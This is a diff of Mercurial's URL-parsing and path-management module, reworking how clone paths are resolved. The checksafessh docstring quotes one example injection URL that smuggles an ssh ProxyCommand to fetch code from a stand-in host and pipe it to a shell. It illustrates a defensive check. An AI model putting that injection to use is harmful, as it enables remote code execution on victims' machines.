Show More
@@ -1,776 +1,792 | |||
|
1 | 1 | # utils.urlutil - code related to [paths] management |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | import os |
|
8 | 8 | import re as remod |
|
9 | 9 | import socket |
|
10 | 10 | |
|
11 | 11 | from ..i18n import _ |
|
12 | 12 | from ..pycompat import ( |
|
13 | 13 | getattr, |
|
14 | 14 | setattr, |
|
15 | 15 | ) |
|
16 | 16 | from .. import ( |
|
17 | 17 | encoding, |
|
18 | 18 | error, |
|
19 | 19 | pycompat, |
|
20 | 20 | urllibcompat, |
|
21 | 21 | ) |
|
22 | 22 | |
|
23 | 23 | |
|
24 | 24 | if pycompat.TYPE_CHECKING: |
|
25 | 25 | from typing import ( |
|
26 | 26 | Union, |
|
27 | 27 | ) |
|
28 | 28 | |
|
29 | 29 | urlreq = urllibcompat.urlreq |
|
30 | 30 | |
|
31 | 31 | |
|
32 | 32 | def getport(port): |
|
33 | 33 | # type: (Union[bytes, int]) -> int |
|
34 | 34 | """Return the port for a given network service. |
|
35 | 35 | |
|
36 | 36 | If port is an integer, it's returned as is. If it's a string, it's |
|
37 | 37 | looked up using socket.getservbyname(). If there's no matching |
|
38 | 38 | service, error.Abort is raised. |
|
39 | 39 | """ |
|
40 | 40 | try: |
|
41 | 41 | return int(port) |
|
42 | 42 | except ValueError: |
|
43 | 43 | pass |
|
44 | 44 | |
|
45 | 45 | try: |
|
46 | 46 | return socket.getservbyname(pycompat.sysstr(port)) |
|
47 | 47 | except socket.error: |
|
48 | 48 | raise error.Abort( |
|
49 | 49 | _(b"no port number associated with service '%s'") % port |
|
50 | 50 | ) |
|
51 | 51 | |
|
52 | 52 | |
|
53 | 53 | class url(object): |
|
54 | 54 | r"""Reliable URL parser. |
|
55 | 55 | |
|
56 | 56 | This parses URLs and provides attributes for the following |
|
57 | 57 | components: |
|
58 | 58 | |
|
59 | 59 | <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> |
|
60 | 60 | |
|
61 | 61 | Missing components are set to None. The only exception is |
|
62 | 62 | fragment, which is set to '' if present but empty. |
|
63 | 63 | |
|
64 | 64 | If parsefragment is False, fragment is included in query. If |
|
65 | 65 | parsequery is False, query is included in path. If both are |
|
66 | 66 | False, both fragment and query are included in path. |
|
67 | 67 | |
|
68 | 68 | See http://www.ietf.org/rfc/rfc2396.txt for more information. |
|
69 | 69 | |
|
70 | 70 | Note that for backward compatibility reasons, bundle URLs do not |
|
71 | 71 | take host names. That means 'bundle://../' has a path of '../'. |
|
72 | 72 | |
|
73 | 73 | Examples: |
|
74 | 74 | |
|
75 | 75 | >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') |
|
76 | 76 | <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> |
|
77 | 77 | >>> url(b'ssh://[::1]:2200//home/joe/repo') |
|
78 | 78 | <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> |
|
79 | 79 | >>> url(b'file:///home/joe/repo') |
|
80 | 80 | <url scheme: 'file', path: '/home/joe/repo'> |
|
81 | 81 | >>> url(b'file:///c:/temp/foo/') |
|
82 | 82 | <url scheme: 'file', path: 'c:/temp/foo/'> |
|
83 | 83 | >>> url(b'bundle:foo') |
|
84 | 84 | <url scheme: 'bundle', path: 'foo'> |
|
85 | 85 | >>> url(b'bundle://../foo') |
|
86 | 86 | <url scheme: 'bundle', path: '../foo'> |
|
87 | 87 | >>> url(br'c:\foo\bar') |
|
88 | 88 | <url path: 'c:\\foo\\bar'> |
|
89 | 89 | >>> url(br'\\blah\blah\blah') |
|
90 | 90 | <url path: '\\\\blah\\blah\\blah'> |
|
91 | 91 | >>> url(br'\\blah\blah\blah#baz') |
|
92 | 92 | <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> |
|
93 | 93 | >>> url(br'file:///C:\users\me') |
|
94 | 94 | <url scheme: 'file', path: 'C:\\users\\me'> |
|
95 | 95 | |
|
96 | 96 | Authentication credentials: |
|
97 | 97 | |
|
98 | 98 | >>> url(b'ssh://joe:xyz@x/repo') |
|
99 | 99 | <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> |
|
100 | 100 | >>> url(b'ssh://joe@x/repo') |
|
101 | 101 | <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> |
|
102 | 102 | |
|
103 | 103 | Query strings and fragments: |
|
104 | 104 | |
|
105 | 105 | >>> url(b'http://host/a?b#c') |
|
106 | 106 | <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> |
|
107 | 107 | >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) |
|
108 | 108 | <url scheme: 'http', host: 'host', path: 'a?b#c'> |
|
109 | 109 | |
|
110 | 110 | Empty path: |
|
111 | 111 | |
|
112 | 112 | >>> url(b'') |
|
113 | 113 | <url path: ''> |
|
114 | 114 | >>> url(b'#a') |
|
115 | 115 | <url path: '', fragment: 'a'> |
|
116 | 116 | >>> url(b'http://host/') |
|
117 | 117 | <url scheme: 'http', host: 'host', path: ''> |
|
118 | 118 | >>> url(b'http://host/#a') |
|
119 | 119 | <url scheme: 'http', host: 'host', path: '', fragment: 'a'> |
|
120 | 120 | |
|
121 | 121 | Only scheme: |
|
122 | 122 | |
|
123 | 123 | >>> url(b'http:') |
|
124 | 124 | <url scheme: 'http'> |
|
125 | 125 | """ |
|
126 | 126 | |
|
127 | 127 | _safechars = b"!~*'()+" |
|
128 | 128 | _safepchars = b"/!~*'()+:\\" |
|
129 | 129 | _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match |
|
130 | 130 | |
|
131 | 131 | def __init__(self, path, parsequery=True, parsefragment=True): |
|
132 | 132 | # type: (bytes, bool, bool) -> None |
|
133 | 133 | # We slowly chomp away at path until we have only the path left |
|
134 | 134 | self.scheme = self.user = self.passwd = self.host = None |
|
135 | 135 | self.port = self.path = self.query = self.fragment = None |
|
136 | 136 | self._localpath = True |
|
137 | 137 | self._hostport = b'' |
|
138 | 138 | self._origpath = path |
|
139 | 139 | |
|
140 | 140 | if parsefragment and b'#' in path: |
|
141 | 141 | path, self.fragment = path.split(b'#', 1) |
|
142 | 142 | |
|
143 | 143 | # special case for Windows drive letters and UNC paths |
|
144 | 144 | if hasdriveletter(path) or path.startswith(b'\\\\'): |
|
145 | 145 | self.path = path |
|
146 | 146 | return |
|
147 | 147 | |
|
148 | 148 | # For compatibility reasons, we can't handle bundle paths as |
|
149 | 149 | # normal URLS |
|
150 | 150 | if path.startswith(b'bundle:'): |
|
151 | 151 | self.scheme = b'bundle' |
|
152 | 152 | path = path[7:] |
|
153 | 153 | if path.startswith(b'//'): |
|
154 | 154 | path = path[2:] |
|
155 | 155 | self.path = path |
|
156 | 156 | return |
|
157 | 157 | |
|
158 | 158 | if self._matchscheme(path): |
|
159 | 159 | parts = path.split(b':', 1) |
|
160 | 160 | if parts[0]: |
|
161 | 161 | self.scheme, path = parts |
|
162 | 162 | self._localpath = False |
|
163 | 163 | |
|
164 | 164 | if not path: |
|
165 | 165 | path = None |
|
166 | 166 | if self._localpath: |
|
167 | 167 | self.path = b'' |
|
168 | 168 | return |
|
169 | 169 | else: |
|
170 | 170 | if self._localpath: |
|
171 | 171 | self.path = path |
|
172 | 172 | return |
|
173 | 173 | |
|
174 | 174 | if parsequery and b'?' in path: |
|
175 | 175 | path, self.query = path.split(b'?', 1) |
|
176 | 176 | if not path: |
|
177 | 177 | path = None |
|
178 | 178 | if not self.query: |
|
179 | 179 | self.query = None |
|
180 | 180 | |
|
181 | 181 | # // is required to specify a host/authority |
|
182 | 182 | if path and path.startswith(b'//'): |
|
183 | 183 | parts = path[2:].split(b'/', 1) |
|
184 | 184 | if len(parts) > 1: |
|
185 | 185 | self.host, path = parts |
|
186 | 186 | else: |
|
187 | 187 | self.host = parts[0] |
|
188 | 188 | path = None |
|
189 | 189 | if not self.host: |
|
190 | 190 | self.host = None |
|
191 | 191 | # path of file:///d is /d |
|
192 | 192 | # path of file:///d:/ is d:/, not /d:/ |
|
193 | 193 | if path and not hasdriveletter(path): |
|
194 | 194 | path = b'/' + path |
|
195 | 195 | |
|
196 | 196 | if self.host and b'@' in self.host: |
|
197 | 197 | self.user, self.host = self.host.rsplit(b'@', 1) |
|
198 | 198 | if b':' in self.user: |
|
199 | 199 | self.user, self.passwd = self.user.split(b':', 1) |
|
200 | 200 | if not self.host: |
|
201 | 201 | self.host = None |
|
202 | 202 | |
|
203 | 203 | # Don't split on colons in IPv6 addresses without ports |
|
204 | 204 | if ( |
|
205 | 205 | self.host |
|
206 | 206 | and b':' in self.host |
|
207 | 207 | and not ( |
|
208 | 208 | self.host.startswith(b'[') and self.host.endswith(b']') |
|
209 | 209 | ) |
|
210 | 210 | ): |
|
211 | 211 | self._hostport = self.host |
|
212 | 212 | self.host, self.port = self.host.rsplit(b':', 1) |
|
213 | 213 | if not self.host: |
|
214 | 214 | self.host = None |
|
215 | 215 | |
|
216 | 216 | if ( |
|
217 | 217 | self.host |
|
218 | 218 | and self.scheme == b'file' |
|
219 | 219 | and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') |
|
220 | 220 | ): |
|
221 | 221 | raise error.Abort( |
|
222 | 222 | _(b'file:// URLs can only refer to localhost') |
|
223 | 223 | ) |
|
224 | 224 | |
|
225 | 225 | self.path = path |
|
226 | 226 | |
|
227 | 227 | # leave the query string escaped |
|
228 | 228 | for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): |
|
229 | 229 | v = getattr(self, a) |
|
230 | 230 | if v is not None: |
|
231 | 231 | setattr(self, a, urlreq.unquote(v)) |
|
232 | 232 | |
|
233 | 233 | def copy(self): |
|
234 | 234 | u = url(b'temporary useless value') |
|
235 | 235 | u.path = self.path |
|
236 | 236 | u.scheme = self.scheme |
|
237 | 237 | u.user = self.user |
|
238 | 238 | u.passwd = self.passwd |
|
239 | 239 | u.host = self.host |
|
240 | 240 | u.path = self.path |
|
241 | 241 | u.query = self.query |
|
242 | 242 | u.fragment = self.fragment |
|
243 | 243 | u._localpath = self._localpath |
|
244 | 244 | u._hostport = self._hostport |
|
245 | 245 | u._origpath = self._origpath |
|
246 | 246 | return u |
|
247 | 247 | |
|
248 | 248 | @encoding.strmethod |
|
249 | 249 | def __repr__(self): |
|
250 | 250 | attrs = [] |
|
251 | 251 | for a in ( |
|
252 | 252 | b'scheme', |
|
253 | 253 | b'user', |
|
254 | 254 | b'passwd', |
|
255 | 255 | b'host', |
|
256 | 256 | b'port', |
|
257 | 257 | b'path', |
|
258 | 258 | b'query', |
|
259 | 259 | b'fragment', |
|
260 | 260 | ): |
|
261 | 261 | v = getattr(self, a) |
|
262 | 262 | if v is not None: |
|
263 | 263 | attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) |
|
264 | 264 | return b'<url %s>' % b', '.join(attrs) |
|
265 | 265 | |
|
266 | 266 | def __bytes__(self): |
|
267 | 267 | r"""Join the URL's components back into a URL string. |
|
268 | 268 | |
|
269 | 269 | Examples: |
|
270 | 270 | |
|
271 | 271 | >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) |
|
272 | 272 | 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' |
|
273 | 273 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) |
|
274 | 274 | 'http://user:pw@host:80/?foo=bar&baz=42' |
|
275 | 275 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) |
|
276 | 276 | 'http://user:pw@host:80/?foo=bar%3dbaz' |
|
277 | 277 | >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) |
|
278 | 278 | 'ssh://user:pw@[::1]:2200//home/joe#' |
|
279 | 279 | >>> bytes(url(b'http://localhost:80//')) |
|
280 | 280 | 'http://localhost:80//' |
|
281 | 281 | >>> bytes(url(b'http://localhost:80/')) |
|
282 | 282 | 'http://localhost:80/' |
|
283 | 283 | >>> bytes(url(b'http://localhost:80')) |
|
284 | 284 | 'http://localhost:80/' |
|
285 | 285 | >>> bytes(url(b'bundle:foo')) |
|
286 | 286 | 'bundle:foo' |
|
287 | 287 | >>> bytes(url(b'bundle://../foo')) |
|
288 | 288 | 'bundle:../foo' |
|
289 | 289 | >>> bytes(url(b'path')) |
|
290 | 290 | 'path' |
|
291 | 291 | >>> bytes(url(b'file:///tmp/foo/bar')) |
|
292 | 292 | 'file:///tmp/foo/bar' |
|
293 | 293 | >>> bytes(url(b'file:///c:/tmp/foo/bar')) |
|
294 | 294 | 'file:///c:/tmp/foo/bar' |
|
295 | 295 | >>> print(url(br'bundle:foo\bar')) |
|
296 | 296 | bundle:foo\bar |
|
297 | 297 | >>> print(url(br'file:///D:\data\hg')) |
|
298 | 298 | file:///D:\data\hg |
|
299 | 299 | """ |
|
300 | 300 | if self._localpath: |
|
301 | 301 | s = self.path |
|
302 | 302 | if self.scheme == b'bundle': |
|
303 | 303 | s = b'bundle:' + s |
|
304 | 304 | if self.fragment: |
|
305 | 305 | s += b'#' + self.fragment |
|
306 | 306 | return s |
|
307 | 307 | |
|
308 | 308 | s = self.scheme + b':' |
|
309 | 309 | if self.user or self.passwd or self.host: |
|
310 | 310 | s += b'//' |
|
311 | 311 | elif self.scheme and ( |
|
312 | 312 | not self.path |
|
313 | 313 | or self.path.startswith(b'/') |
|
314 | 314 | or hasdriveletter(self.path) |
|
315 | 315 | ): |
|
316 | 316 | s += b'//' |
|
317 | 317 | if hasdriveletter(self.path): |
|
318 | 318 | s += b'/' |
|
319 | 319 | if self.user: |
|
320 | 320 | s += urlreq.quote(self.user, safe=self._safechars) |
|
321 | 321 | if self.passwd: |
|
322 | 322 | s += b':' + urlreq.quote(self.passwd, safe=self._safechars) |
|
323 | 323 | if self.user or self.passwd: |
|
324 | 324 | s += b'@' |
|
325 | 325 | if self.host: |
|
326 | 326 | if not (self.host.startswith(b'[') and self.host.endswith(b']')): |
|
327 | 327 | s += urlreq.quote(self.host) |
|
328 | 328 | else: |
|
329 | 329 | s += self.host |
|
330 | 330 | if self.port: |
|
331 | 331 | s += b':' + urlreq.quote(self.port) |
|
332 | 332 | if self.host: |
|
333 | 333 | s += b'/' |
|
334 | 334 | if self.path: |
|
335 | 335 | # TODO: similar to the query string, we should not unescape the |
|
336 | 336 | # path when we store it, the path might contain '%2f' = '/', |
|
337 | 337 | # which we should *not* escape. |
|
338 | 338 | s += urlreq.quote(self.path, safe=self._safepchars) |
|
339 | 339 | if self.query: |
|
340 | 340 | # we store the query in escaped form. |
|
341 | 341 | s += b'?' + self.query |
|
342 | 342 | if self.fragment is not None: |
|
343 | 343 | s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) |
|
344 | 344 | return s |
|
345 | 345 | |
|
346 | 346 | __str__ = encoding.strmethod(__bytes__) |
|
347 | 347 | |
|
348 | 348 | def authinfo(self): |
|
349 | 349 | user, passwd = self.user, self.passwd |
|
350 | 350 | try: |
|
351 | 351 | self.user, self.passwd = None, None |
|
352 | 352 | s = bytes(self) |
|
353 | 353 | finally: |
|
354 | 354 | self.user, self.passwd = user, passwd |
|
355 | 355 | if not self.user: |
|
356 | 356 | return (s, None) |
|
357 | 357 | # authinfo[1] is passed to urllib2 password manager, and its |
|
358 | 358 | # URIs must not contain credentials. The host is passed in the |
|
359 | 359 | # URIs list because Python < 2.4.3 uses only that to search for |
|
360 | 360 | # a password. |
|
361 | 361 | return (s, (None, (s, self.host), self.user, self.passwd or b'')) |
|
362 | 362 | |
|
363 | 363 | def isabs(self): |
|
364 | 364 | if self.scheme and self.scheme != b'file': |
|
365 | 365 | return True # remote URL |
|
366 | 366 | if hasdriveletter(self.path): |
|
367 | 367 | return True # absolute for our purposes - can't be joined() |
|
368 | 368 | if self.path.startswith(br'\\'): |
|
369 | 369 | return True # Windows UNC path |
|
370 | 370 | if self.path.startswith(b'/'): |
|
371 | 371 | return True # POSIX-style |
|
372 | 372 | return False |
|
373 | 373 | |
|
374 | 374 | def localpath(self): |
|
375 | 375 | # type: () -> bytes |
|
376 | 376 | if self.scheme == b'file' or self.scheme == b'bundle': |
|
377 | 377 | path = self.path or b'/' |
|
378 | 378 | # For Windows, we need to promote hosts containing drive |
|
379 | 379 | # letters to paths with drive letters. |
|
380 | 380 | if hasdriveletter(self._hostport): |
|
381 | 381 | path = self._hostport + b'/' + self.path |
|
382 | 382 | elif ( |
|
383 | 383 | self.host is not None and self.path and not hasdriveletter(path) |
|
384 | 384 | ): |
|
385 | 385 | path = b'/' + path |
|
386 | 386 | return path |
|
387 | 387 | return self._origpath |
|
388 | 388 | |
|
389 | 389 | def islocal(self): |
|
390 | 390 | '''whether localpath will return something that posixfile can open''' |
|
391 | 391 | return ( |
|
392 | 392 | not self.scheme |
|
393 | 393 | or self.scheme == b'file' |
|
394 | 394 | or self.scheme == b'bundle' |
|
395 | 395 | ) |
|
396 | 396 | |
|
397 | 397 | |
|
398 | 398 | def hasscheme(path): |
|
399 | 399 | # type: (bytes) -> bool |
|
400 | 400 | return bool(url(path).scheme) # cast to help pytype |
|
401 | 401 | |
|
402 | 402 | |
|
403 | 403 | def hasdriveletter(path): |
|
404 | 404 | # type: (bytes) -> bool |
|
405 | 405 | return bool(path) and path[1:2] == b':' and path[0:1].isalpha() |
|
406 | 406 | |
|
407 | 407 | |
|
408 | 408 | def urllocalpath(path): |
|
409 | 409 | # type: (bytes) -> bytes |
|
410 | 410 | return url(path, parsequery=False, parsefragment=False).localpath() |
|
411 | 411 | |
|
412 | 412 | |
|
413 | 413 | def checksafessh(path): |
|
414 | 414 | # type: (bytes) -> None |
|
415 | 415 | """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
416 | 416 | |
|
417 | 417 | This is a sanity check for ssh urls. ssh will parse the first item as |
|
418 | 418 | an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
419 | 419 | Let's prevent these potentially exploited urls entirely and warn the |
|
420 | 420 | user. |
|
421 | 421 | |
|
422 | 422 | Raises an error.Abort when the url is unsafe. |
|
423 | 423 | """ |
|
424 | 424 | path = urlreq.unquote(path) |
|
425 | 425 | if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): |
|
426 | 426 | raise error.Abort( |
|
427 | 427 | _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) |
|
428 | 428 | ) |
|
429 | 429 | |
|
430 | 430 | |
|
431 | 431 | def hidepassword(u): |
|
432 | 432 | # type: (bytes) -> bytes |
|
433 | 433 | '''hide user credential in a url string''' |
|
434 | 434 | u = url(u) |
|
435 | 435 | if u.passwd: |
|
436 | 436 | u.passwd = b'***' |
|
437 | 437 | return bytes(u) |
|
438 | 438 | |
|
439 | 439 | |
|
440 | 440 | def removeauth(u): |
|
441 | 441 | # type: (bytes) -> bytes |
|
442 | 442 | '''remove all authentication information from a url string''' |
|
443 | 443 | u = url(u) |
|
444 | 444 | u.user = u.passwd = None |
|
445 | 445 | return bytes(u) |
|
446 | 446 | |
|
447 | 447 | |
|
448 | 448 | def get_push_paths(repo, ui, dests): |
|
449 | 449 | """yields all the `path` selected as push destination by `dests`""" |
|
450 | 450 | if not dests: |
|
451 | 451 | if b'default-push' in ui.paths: |
|
452 | 452 | yield ui.paths[b'default-push'] |
|
453 | 453 | elif b'default' in ui.paths: |
|
454 | 454 | yield ui.paths[b'default'] |
|
455 | 455 | else: |
|
456 | 456 | raise error.ConfigError( |
|
457 | 457 | _(b'default repository not configured!'), |
|
458 | 458 | hint=_(b"see 'hg help config.paths'"), |
|
459 | 459 | ) |
|
460 | 460 | else: |
|
461 | 461 | for dest in dests: |
|
462 | 462 | yield ui.getpath(dest) |
|
463 | 463 | |
|
464 | 464 | |
|
465 | 465 | def get_pull_paths(repo, ui, sources, default_branches=()): |
|
466 | 466 | """yields all the `(path, branch)` selected as pull source by `sources`""" |
|
467 | 467 | if not sources: |
|
468 | 468 | sources = [b'default'] |
|
469 | 469 | for source in sources: |
|
470 | 470 | if source in ui.paths: |
|
471 | 471 | url = ui.paths[source].rawloc |
|
472 | 472 | else: |
|
473 | 473 | # Try to resolve as a local path or URI. |
|
474 | 474 | try: |
|
475 | 475 | # we pass the ui instance are warning might need to be issued |
|
476 | 476 | url = path(ui, None, rawloc=source).rawloc |
|
477 | 477 | except ValueError: |
|
478 | 478 | url = source |
|
479 | 479 | yield parseurl(url, default_branches) |
|
480 | 480 | |
|
481 | 481 | |
|
482 | 482 | def get_unique_push_path(action, repo, ui, dest=None): |
|
483 | 483 | """return a unique `path` or abort if multiple are found |
|
484 | 484 | |
|
485 | 485 | This is useful for command and action that does not support multiple |
|
486 | 486 | destination (yet). |
|
487 | 487 | |
|
488 | 488 | Note that for now, we cannot get multiple destination so this function is "trivial". |
|
489 | 489 | |
|
490 | 490 | The `action` parameter will be used for the error message. |
|
491 | 491 | """ |
|
492 | 492 | if dest is None: |
|
493 | 493 | dests = [] |
|
494 | 494 | else: |
|
495 | 495 | dests = [dest] |
|
496 | 496 | dests = list(get_push_paths(repo, ui, dests)) |
|
497 | 497 | assert len(dests) == 1 |
|
498 | 498 | return dests[0] |
|
499 | 499 | |
|
500 | 500 | |
|
501 | 501 | def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): |
|
502 | 502 | """return a unique `(path, branch)` or abort if multiple are found |
|
503 | 503 | |
|
504 | 504 | This is useful for command and action that does not support multiple |
|
505 | 505 | destination (yet). |
|
506 | 506 | |
|
507 | 507 | Note that for now, we cannot get multiple destination so this function is "trivial". |
|
508 | 508 | |
|
509 | 509 | The `action` parameter will be used for the error message. |
|
510 | 510 | """ |
|
511 | 511 | if source is None: |
|
512 | 512 | if b'default' in ui.paths: |
|
513 | 513 | url = ui.paths[b'default'].rawloc |
|
514 | 514 | else: |
|
515 | 515 | # XXX this is the historical default behavior, but that is not |
|
516 | 516 | # great, consider breaking BC on this. |
|
517 | 517 | url = b'default' |
|
518 | 518 | else: |
|
519 | 519 | if source in ui.paths: |
|
520 | 520 | url = ui.paths[source].rawloc |
|
521 | 521 | else: |
|
522 | 522 | # Try to resolve as a local path or URI. |
|
523 | 523 | try: |
|
524 | 524 | # we pass the ui instance are warning might need to be issued |
|
525 | 525 | url = path(ui, None, rawloc=source).rawloc |
|
526 | 526 | except ValueError: |
|
527 | 527 | url = source |
|
528 | 528 | return parseurl(url, default_branches) |
|
529 | 529 | |
|
530 | 530 | |
|
531 | 531 | def get_clone_path(ui, source, default_branches=()): |
|
532 | 532 | """return the `(origsource, path, branch)` selected as clone source""" |
|
533 | url = ui.expandpath(source) | |
|
534 | path, branch = parseurl(url, default_branches) | |
|
535 | return url, path, branch | |
|
533 | if source is None: | |
|
534 | if b'default' in ui.paths: | |
|
535 | url = ui.paths[b'default'].rawloc | |
|
536 | else: | |
|
537 | # XXX this is the historical default behavior, but that is not | |
|
538 | # great, consider breaking BC on this. | |
|
539 | url = b'default' | |
|
540 | else: | |
|
541 | if source in ui.paths: | |
|
542 | url = ui.paths[source].rawloc | |
|
543 | else: | |
|
544 | # Try to resolve as a local path or URI. | |
|
545 | try: | |
|
546 | # we pass the ui instance are warning might need to be issued | |
|
547 | url = path(ui, None, rawloc=source).rawloc | |
|
548 | except ValueError: | |
|
549 | url = source | |
|
550 | clone_path, branch = parseurl(url, default_branches) | |
|
551 | return url, clone_path, branch | |
|
536 | 552 | |
|
537 | 553 | |
|
538 | 554 | def parseurl(path, branches=None): |
|
539 | 555 | '''parse url#branch, returning (url, (branch, branches))''' |
|
540 | 556 | u = url(path) |
|
541 | 557 | branch = None |
|
542 | 558 | if u.fragment: |
|
543 | 559 | branch = u.fragment |
|
544 | 560 | u.fragment = None |
|
545 | 561 | return bytes(u), (branch, branches or []) |
|
546 | 562 | |
|
547 | 563 | |
|
548 | 564 | class paths(dict): |
|
549 | 565 | """Represents a collection of paths and their configs. |
|
550 | 566 | |
|
551 | 567 | Data is initially derived from ui instances and the config files they have |
|
552 | 568 | loaded. |
|
553 | 569 | """ |
|
554 | 570 | |
|
555 | 571 | def __init__(self, ui): |
|
556 | 572 | dict.__init__(self) |
|
557 | 573 | |
|
558 | 574 | for name, loc in ui.configitems(b'paths', ignoresub=True): |
|
559 | 575 | # No location is the same as not existing. |
|
560 | 576 | if not loc: |
|
561 | 577 | continue |
|
562 | 578 | loc, sub_opts = ui.configsuboptions(b'paths', name) |
|
563 | 579 | self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) |
|
564 | 580 | |
|
565 | 581 | for name, p in sorted(self.items()): |
|
566 | 582 | p.chain_path(ui, self) |
|
567 | 583 | |
|
568 | 584 | def getpath(self, ui, name, default=None): |
|
569 | 585 | """Return a ``path`` from a string, falling back to default. |
|
570 | 586 | |
|
571 | 587 | ``name`` can be a named path or locations. Locations are filesystem |
|
572 | 588 | paths or URIs. |
|
573 | 589 | |
|
574 | 590 | Returns None if ``name`` is not a registered path, a URI, or a local |
|
575 | 591 | path to a repo. |
|
576 | 592 | """ |
|
577 | 593 | # Only fall back to default if no path was requested. |
|
578 | 594 | if name is None: |
|
579 | 595 | if not default: |
|
580 | 596 | default = () |
|
581 | 597 | elif not isinstance(default, (tuple, list)): |
|
582 | 598 | default = (default,) |
|
583 | 599 | for k in default: |
|
584 | 600 | try: |
|
585 | 601 | return self[k] |
|
586 | 602 | except KeyError: |
|
587 | 603 | continue |
|
588 | 604 | return None |
|
589 | 605 | |
|
590 | 606 | # Most likely empty string. |
|
591 | 607 | # This may need to raise in the future. |
|
592 | 608 | if not name: |
|
593 | 609 | return None |
|
594 | 610 | |
|
595 | 611 | try: |
|
596 | 612 | return self[name] |
|
597 | 613 | except KeyError: |
|
598 | 614 | # Try to resolve as a local path or URI. |
|
599 | 615 | try: |
|
600 | 616 | # we pass the ui instance are warning might need to be issued |
|
601 | 617 | return path(ui, None, rawloc=name) |
|
602 | 618 | except ValueError: |
|
603 | 619 | raise error.RepoError(_(b'repository %s does not exist') % name) |
|
604 | 620 | |
|
605 | 621 | |
|
606 | 622 | _pathsuboptions = {} |
|
607 | 623 | |
|
608 | 624 | |
|
609 | 625 | def pathsuboption(option, attr): |
|
610 | 626 | """Decorator used to declare a path sub-option. |
|
611 | 627 | |
|
612 | 628 | Arguments are the sub-option name and the attribute it should set on |
|
613 | 629 | ``path`` instances. |
|
614 | 630 | |
|
615 | 631 | The decorated function will receive as arguments a ``ui`` instance, |
|
616 | 632 | ``path`` instance, and the string value of this option from the config. |
|
617 | 633 | The function should return the value that will be set on the ``path`` |
|
618 | 634 | instance. |
|
619 | 635 | |
|
620 | 636 | This decorator can be used to perform additional verification of |
|
621 | 637 | sub-options and to change the type of sub-options. |
|
622 | 638 | """ |
|
623 | 639 | |
|
624 | 640 | def register(func): |
|
625 | 641 | _pathsuboptions[option] = (attr, func) |
|
626 | 642 | return func |
|
627 | 643 | |
|
628 | 644 | return register |
|
629 | 645 | |
|
630 | 646 | |
|
631 | 647 | @pathsuboption(b'pushurl', b'pushloc') |
|
632 | 648 | def pushurlpathoption(ui, path, value): |
|
633 | 649 | u = url(value) |
|
634 | 650 | # Actually require a URL. |
|
635 | 651 | if not u.scheme: |
|
636 | 652 | ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) |
|
637 | 653 | return None |
|
638 | 654 | |
|
639 | 655 | # Don't support the #foo syntax in the push URL to declare branch to |
|
640 | 656 | # push. |
|
641 | 657 | if u.fragment: |
|
642 | 658 | ui.warn( |
|
643 | 659 | _( |
|
644 | 660 | b'("#fragment" in paths.%s:pushurl not supported; ' |
|
645 | 661 | b'ignoring)\n' |
|
646 | 662 | ) |
|
647 | 663 | % path.name |
|
648 | 664 | ) |
|
649 | 665 | u.fragment = None |
|
650 | 666 | |
|
651 | 667 | return bytes(u) |
|
652 | 668 | |
|
653 | 669 | |
|
654 | 670 | @pathsuboption(b'pushrev', b'pushrev') |
|
655 | 671 | def pushrevpathoption(ui, path, value): |
|
656 | 672 | return value |
|
657 | 673 | |
|
658 | 674 | |
|
659 | 675 | class path(object): |
|
660 | 676 | """Represents an individual path and its configuration.""" |
|
661 | 677 | |
|
662 | 678 | def __init__(self, ui, name, rawloc=None, suboptions=None): |
|
663 | 679 | """Construct a path from its config options. |
|
664 | 680 | |
|
665 | 681 | ``ui`` is the ``ui`` instance the path is coming from. |
|
666 | 682 | ``name`` is the symbolic name of the path. |
|
667 | 683 | ``rawloc`` is the raw location, as defined in the config. |
|
668 | 684 | ``pushloc`` is the raw locations pushes should be made to. |
|
669 | 685 | |
|
670 | 686 | If ``name`` is not defined, we require that the location be a) a local |
|
671 | 687 | filesystem path with a .hg directory or b) a URL. If not, |
|
672 | 688 | ``ValueError`` is raised. |
|
673 | 689 | """ |
|
674 | 690 | if not rawloc: |
|
675 | 691 | raise ValueError(b'rawloc must be defined') |
|
676 | 692 | |
|
677 | 693 | # Locations may define branches via syntax <base>#<branch>. |
|
678 | 694 | u = url(rawloc) |
|
679 | 695 | branch = None |
|
680 | 696 | if u.fragment: |
|
681 | 697 | branch = u.fragment |
|
682 | 698 | u.fragment = None |
|
683 | 699 | |
|
684 | 700 | self.url = u |
|
685 | 701 | # the url from the config/command line before dealing with `path://` |
|
686 | 702 | self.raw_url = u.copy() |
|
687 | 703 | self.branch = branch |
|
688 | 704 | |
|
689 | 705 | self.name = name |
|
690 | 706 | self.rawloc = rawloc |
|
691 | 707 | self.loc = b'%s' % u |
|
692 | 708 | |
|
693 | 709 | self._validate_path() |
|
694 | 710 | |
|
